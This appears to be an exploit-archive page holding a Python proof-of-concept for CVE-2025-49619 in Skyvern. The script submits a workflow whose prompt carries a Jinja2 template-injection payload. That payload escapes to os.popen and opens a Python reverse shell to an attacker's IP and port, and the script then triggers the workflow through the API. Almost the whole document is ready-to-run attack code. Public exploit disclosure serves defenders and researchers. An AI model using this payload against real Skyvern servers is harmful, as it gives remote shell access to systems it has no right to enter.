4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
# Exploit Title: Skyvern ≤ 0.1.85 Blind RCE via SSTI
# Date: 2025-06-15
# Exploit Author: Cristian Branet
# Vendor Homepage: https://www.skyvern.com/
# Software Link: https://github.com/Skyvern-AI/skyvern
# Version: < 0.1.85, before commit db856cd
# Tested on: Linux (Ubuntu 22.04)
# CVE : CVE-2025-49619
# Article: https://cristibtz.github.io/posts/CVE-2025-49619/

'''
Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax.
An attacker with low privileges can inject a malicious payload in a block that contains Prompt section,
which gets rendered server-side, resulting in blind remote code execution via curl.
'''

import requests, argparse, pyfiglet

parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-u", "--url", required=True, help="Skyvern server URL (e.g., http://localhost:8000)")
parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key")
parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection")
parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection")

class Exploit:

    def __init__(self, url, ip, port, x_api_key):
        self.url = url
        self.ip = ip
        self.port = port
        self.x_api_key = x_api_key

    def create_exploit_workflow(self):
        exploit_workflow = {
        "title": "Exploit",
        "description": "",
        "proxy_location": "RESIDENTIAL",
        "webhook_callback_url": "",
        "persist_browser_session": False,
        "model": None,
        "totp_verification_url": None,
        "workflow_definition": {
            "parameters": [],
            "blocks": [
                {
                    "label": "block_1",
                    "continue_on_failure": False,
                    "block_type": "task_v2",
                    "prompt": (
                        "{% for x in ().__class__.__base__.__subclasses__() %}\n"
                        "  {% if 'warning' in x.__name__ %}\n"
                        "    {{ x()._module.__builtins__['__import__']('os').popen(\n"
                        "      \"python3 -c 'import socket,os,pty;\"\n"
                        "      \"s=socket.socket();\"\n"
                        f"     \'s.connect((\\\"{self.ip}\\\",{self.port}));\'\n"
                        "      \"os.dup2(s.fileno(),0);\"\n"
                        "      \"os.dup2(s.fileno(),1);\"\n"
                        "      \"os.dup2(s.fileno(),2);\"\n"
                        "      \"pty.spawn(\\\"sh\\\")'\"\n"
                        "    ).read() }}\n"
                        "  {% endif %}\n"
                        "{% endfor %}"
                    ),
                    "url": "",
                    "max_steps": 25,
                    "totp_identifier": None,
                    "totp_verification_url": None
                }
            ]
        },
        "is_saved_task": False
        }

        headers = {
            "Content-Type": "application/json",
            "X-API-Key": self.x_api_key
        }
        response = requests.post(f"{self.url}/api/v1/workflows", json=exploit_workflow, headers=headers)

        if response.status_code == 200:
            print("[+] Exploit workflow created successfully!")
        else:
            print("[-] Failed to create exploit workflow:", response.text)
            return None
        
        workflow_permanent_id = response.json().get("workflow_permanent_id")

        print(f"[+] Workflow Permanent ID: {workflow_permanent_id}")

        return workflow_permanent_id
    
    def run_exploit_workflow(self, workflow_permanent_id):

        workflow_data = {
            "workflow_id": workflow_permanent_id
        }

        headers = {
            "Content-Type": "application/json",
            "X-API-Key": self.x_api_key
        }
        response = requests.post(f"{self.url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers)

        if response.status_code == 200:
            print("[+] Exploit workflow executed successfully!")
        else:
            print("[-] Failed to execute exploit workflow:", response.text)

if __name__=="__main__":

    print("\n")
    print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100))
    print("Author: Cristian Branet")
    print("GitHub: github.com/cristibtz")
    print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.")
    print("\n")

    args = parser.parse_args()
    url = args.url
    x_api_key = args.x_api_key
    ip = args.ip
    port = args.port

    skyvern_exploit = Exploit(url, ip, port, x_api_key)

    workflow_permanent_id = skyvern_exploit.create_exploit_workflow()

    skyvern_exploit.run_exploit_workflow(workflow_permanent_id)